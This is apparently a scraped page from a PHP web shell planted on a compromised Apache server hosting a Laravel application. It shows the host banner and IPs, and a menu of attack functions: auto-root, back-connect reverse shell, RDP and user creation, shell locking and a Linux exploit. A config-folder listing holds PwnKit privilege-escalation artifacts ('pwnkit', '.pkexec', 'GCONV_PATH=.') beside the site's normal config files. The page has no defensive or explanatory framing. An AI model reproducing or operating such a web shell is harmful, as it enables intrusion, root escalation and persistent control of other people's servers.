Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo8.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
app.php
9.51
KB
-rw-r--r--
auth.php
3.06
KB
-rw-r--r--
broadcasting.php
1.57
KB
-rw-r--r--
cache.php
3.03
KB
-rw-r--r--
calling_codes.php
30.23
KB
-rw-r--r--
database.php
3.86
KB
-rw-r--r--
dompdf.php
10.14
KB
-rw-r--r--
filesystems.php
2.09
KB
-rw-r--r--
froiden_envato.php
1.65
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.52
KB
-rw-r--r--
installer.php
1.18
KB
-rw-r--r--
laratrust.php
8.23
KB
-rw-r--r--
laratrust_seeder.php
2.22
KB
-rw-r--r--
logging.php
2.17
KB
-rw-r--r--
mail.php
3.73
KB
-rw-r--r--
nexmo.php
2.81
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
2.58
KB
-rw-r--r--
services.php
2.67
KB
-rw-r--r--
session.php
6.86
KB
-rw-r--r--
translation-manager.php
1.44
KB
-rw-r--r--
view.php
1004
B
-rw-r--r--
vonage.php
3.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filesystems.php
<?php return [ /* |-------------------------------------------------------------------------- | Default Filesystem Disk |-------------------------------------------------------------------------- | | Here you may specify the default filesystem disk that should be used | by the framework. The "local" disk, as well as a variety of cloud | based disks are available to your application. Just store away! | */ 'default' => env('FILESYSTEM_DRIVER', 'local'), /* |-------------------------------------------------------------------------- | Default Cloud Filesystem Disk |-------------------------------------------------------------------------- | | Many applications store files both locally and in the cloud. For this | reason, you may specify a default "cloud" driver here. This driver | will be bound as the Cloud disk implementation in the container. | */ 'cloud' => env('FILESYSTEM_CLOUD', 's3'), /* |-------------------------------------------------------------------------- | Filesystem Disks |-------------------------------------------------------------------------- | | Here you may configure as many filesystem "disks" as you wish, and you | may even configure multiple disks of the same driver. Defaults have | been setup for each driver as an example of the required options. | | Supported Drivers: "local", "ftp", "sftp", "s3", "rackspace" | */ 'disks' => [ 'local' => [ 'driver' => 'local', 'root' => public_path('user-uploads'), ], 'public' => [ 'driver' => 'local', 'root' => storage_path('app/public'), 'url' => env('APP_URL').'/storage', 'visibility' => 'public', ], 's3' => [ 'driver' => 's3', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION'), 'bucket' => env('AWS_BUCKET'), 'url' => env('AWS_URL'), ], ], ];
Close